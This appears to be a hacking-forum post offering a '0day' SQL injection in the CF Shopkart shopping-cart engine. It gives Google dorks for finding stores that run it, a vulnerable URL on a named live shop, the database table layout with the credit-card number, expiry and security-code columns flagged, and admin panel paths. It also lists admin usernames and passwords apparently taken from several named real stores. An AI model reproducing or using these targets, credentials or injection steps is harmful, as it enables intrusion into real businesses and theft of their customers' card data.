Jump to content
The_Arhitect

0Day Exploit 1 - Shopping Cart.

By The_Arhitect, in Exploituri

Recommended Posts

The_Arhitect Newbie

The_Arhitect

Posted
Posted

0Day Exploit 1 - Shopping Cart. 

# Exploit Title: CF Shopkart Shopping Site Engine [MSAcess&MYSQL SQL Injection] 0day
# Date: 12/1/12
# Author: Srblche
# Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/
# Version: v4.x.x - v5.x.x
# Category:: Webapps
# Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for"
# Tested on: Windows 7 and Backtrack

## 18,600 results

## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE]

Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29

In Depth Analysis: Most CF ShopKart scripts runs either MSAccess or MYSQLv5 databases. However we can get through both. The admin directory is always located at /admin/
This 0day was made for Srblche.

---------------------
TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODES
TABLE [users] CONTAINS ADMIN INFO
ADMIN PANEL LINK WILL ALWAYS BE AT [/admin]
---------------------
MSACCESS HELP - [+]

Table Names of CF ShopKart --
categories
checkoutheader
companyinfo
contacts
customerhistory
discounts
emaillist
gallery
gallerycats
gallerycomments
gallerynotes
graphics
help
homepage
imagecategories
ipcountries
links
logins
options
order\_no
orderdetails
orders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumber
pages
products
promos
sales
sellingareas
sentmessages
settings
settings2
shippingsurcharges
shippingtable1
shippingtable2
shippingtable3
shippingtable4
shippingtable5
shippingtypes
shoppingcarts
stats
stats\_archive
storeheader
taxes
temporders
upsconfig
users ---------------------------------->> UserID,UserName,Password,UserLevel
wishlistitems
wishlists







--------------------------------------------------------------------------------

https://www.streetsourceleds.com/(secure)/admin//admin.cfm

Data Found: UserID,UserName,Password,UserLevel=20^admin^incentives^Admin
Data Found: UserID,UserName,Password,UserLevel=22^stalerico^kazoo^Admin

CVV's in only some orders.
--------------------------------------------------------------------------------

https://www.zijagear.com/shop/admin/admin.cfm

admin:taylor12

(paypal shop, no cc's found unless setting changed in options to store cc details)
--------------------------------------------------------------------------------


EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken=

(About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/admin


admin:taylor12

=============================================================

http://www.augersidekick.com

Column Data: admin
Data Found: username=admin
Length of 'Column Data' is 10
Column Data: chrisnmarc
Data Found: password=chrisnmarc

  • Upvote 2

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...